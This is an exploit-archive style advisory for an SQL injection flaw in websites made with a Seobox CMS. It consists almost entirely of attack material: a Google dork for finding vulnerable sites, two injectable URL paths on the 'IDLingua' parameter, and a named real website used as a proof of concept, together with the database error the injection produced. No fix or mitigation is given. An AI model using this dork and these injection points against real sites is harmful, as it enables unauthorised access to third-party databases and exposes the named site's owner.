#################################################################################################
# Exploit Title : Realizzato da Seobox di Massimo Sgambato SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 03/06/2018
# Vendor Homepage : seoobox.it
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Google Dork : intext:''Realizzato da Seobox di Massimo Sgambato''
# Exploit : /news.asp?ID=[ID-NUMBER]&IDLingua=[SQL Injection]
# Exploit : /contatti.asp?ID=[ID-NUMBER]&IDLingua=[SQL Injection]
#################################################################################################
# Example Site => rifugioalsole.it/news.asp?ID=341&IDLingua=2%27 => [ Proof of Concept ] => archive.is/yjCcw
# SQL-DB Error =>
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'Sigla like '2'''.
/projectprocedure.inc, line 727
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################